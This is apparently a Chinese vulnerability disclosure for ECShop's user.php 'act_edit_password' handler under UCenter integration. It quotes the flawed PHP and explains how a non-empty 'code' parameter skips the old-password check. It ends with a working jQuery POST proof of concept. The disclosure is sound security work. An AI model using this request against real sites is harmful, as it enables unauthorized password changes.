### 简要描述: 最新版本也存在此问题 ### 详细说明: 该漏洞有个前提,需要会员系统整合ucenter 问题出在 user.php $action == 'act_edit_password' [<img src="https://images.seebug.org/upload/201402/17093718e31e126b76cb15fd17cc3ad8b15588ef.png" alt="QQ截图20140217093645.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/17093718e31e126b76cb15fd17cc3ad8b15588ef.png) ``` $old_password = isset($_POST['old_password']) ? trim($_POST['old_password']) : ''; $new_password = isset($_POST['new_password']) ? trim($_POST['new_password']) : ''; $user_id = isset($_POST['uid']) ? intval($_POST['uid']) : $user_id; $code = isset($_POST['code']) ? trim($_POST['code']) : ''; if (strlen($new_password) < 6) { show_message($_LANG['passport_js']['password_shorter']); } $user_info = $user->get_profile_by_id($user_id); //论坛记录 if (($user_info && (!empty($code) && md5($user_info['user_id'] . $_CFG['hash_code'] . $user_info['reg_time']) == $code)) || ($_SESSION['user_id']>0 && $_SESSION['user_id'] == $user_id && $user->check_user($_SESSION['user_name'], $old_password))) { if ($user->edit_user(array('username'=> (empty($code) ? $_SESSION['user_name'] : $user_info['user_name']), 'old_password'=>$old_password, 'password'=>$new_password), empty($code) ? 0 : 1)) { $user->logout(); show_message($_LANG['edit_password_success'], $_LANG['relogin_lnk'], 'user.php?act=login', 'info'); } else { show_message($_LANG['edit_password_failure'], $_LANG['back_page_up'], '', 'info'); } } ``` 我把上面主要代码精简一下 $code='123'; $old_password=null; $user_info['user_name']=当前用户名 ``` if( false ||$_SESSION['user_id']>0 && $_SESSION['user_id'] == $user_id && $user->check_user($_SESSION['user_name'], $old_password))){ #ucenter 模块中check_user未对原密码校验此处为True if ($user->edit_user(array('username'=> ( $user_info['user_name']), 'old_password'=>$old_password, 'password'=>$new_password), 1)) { #edit_user() $code不为空,所以最后一个参数为1 则不校验原密码直接修改 成功修改密码 } } ``` 问题主要出在两个地方 1.ucenter用户整合模块实现check_user()时未校验原密码 2. 
通过 code 找回密码的逻辑和通过原密码修改密码的逻辑被写进了同一个 if 条件里:请求实际是靠 $_SESSION 那个分支通过授权的,但传给 edit_user() 的最后一个参数却只看 $code 是否为空(empty($code) ? 0 : 1),两者并不对应,所以只要 $code 非空就会跳过原密码校验。if 语句嵌套太多容易扯着蛋蛋 ### 漏洞证明: 登录网站后打开浏览器调试工具,粘贴以下 js 代码运行(为了简化代码,假设页面已加载 jquery) ``` $.post('user.php?act=act_edit_password',{'new_password':'123456',code:'不为空就行'}, function(data){ }); ``` 然后刷新页面,若已变为退出状态,则说明密码修改成功(修改成功后代码会调用 $user->logout())